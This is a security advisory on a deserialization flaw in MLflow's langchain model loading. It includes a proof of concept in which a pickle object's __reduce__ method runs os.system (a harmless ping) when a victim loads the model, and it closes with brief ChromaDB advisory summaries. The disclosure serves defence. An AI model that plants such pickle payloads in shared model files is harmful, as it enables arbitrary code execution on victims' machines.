SAI Security Advisory

Cloudpickle Load on Langchain AgentExecutor Model Load Leading to Code Execution

June 4, 2024

Summary

A deserialization vulnerability exists within the mlflow/langchain/utils.py file, within the function _load_from_pickle. An attacker can inject a malicious pickle object into a model file on upload which will then be deserialized when the model is loaded, executing the malicious code on the victim machine.

Products Impacted

This vulnerability was introduced in version 2.5.0 of MLflow.

CVSS Score: 8.8

AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE Categorization

CWE-502: Deserialization of Untrusted Data.

Details

The vulnerability exists within the mlflow/langchain/utils.py file, within the function _load_from_pickle. This is called when the mlflow.langchain.load_model function is called.

def _load_from_pickle(path):
	with open(path, "rb") as f:
    		return cloudpickle.load(f)

An attacker can exploit this by building an AgentExecutor with Tools specially crafted to trigger the below elif statement within the _save_base_lcs function of the same utils.py file. The attacker could alter the code within this method, crafting a pickle object that will execute arbitrary code when deserialized and pass it to cloudpickle.dump().

/

elif isinstance(model, langchain.agents.agent.AgentExecutor):
    	...

    	if model.tools:
        	tools_data_path = os.path.join(path, _TOOLS_DATA_FILE_NAME)
        	try:
            	class RunCommand:
                	def __reduce__(self):
                    	return (os.system, ('ping -c 4 8.8.8.8',))

            	command = RunCommand()
            	with open(tools_data_path, "wb") as f:
                	cloudpickle.dump(command, f)

This model can then be logged to the server at the specified tracking URI by calling the model.langchain.log_model() function.

When the model is loaded by the victim (example code snippet below), the arbitrary code is executed on their machine:

/

import mlflow
...
logged_model = "models:/LangchainPickle/1"
loaded_model = mlflow.langchain.load_model(logged_model, dst_path='/tmp/langchain_model')

Related SAI Security Advisory

CVE-2026-45833

June 12, 2026

Post-Authentication RCE via update_collection

ChromaDB

Any authenticated user with UPDATE_COLLECTION permission can achieve remote code execution by updating a collection's embedding function to reference a malicious HuggingFace model with trust_remote_code: true. The update_collection endpoint uses the same build_from_config() code path as CVE-2026-45829. Authentication runs before model loading, so this is not a pre-authentication issue, but the model instantiation itself is unguarded.

June 2026
CVE-2026-45832

June 12, 2026

V1 API Tenant Isolation Bypass via Null Tenant/Database Context

ChromaDB

All V1 collection-level endpoints pass None for tenant and database to the authorization layer, making tenant-scoped access control impossible through V1, regardless of which authorization provider is configured. V1 cannot be disabled. Combined with CVE-2026-45830, any authenticated user has unrestricted read/write access to any collection by UUID through V1 endpoints.

June 2026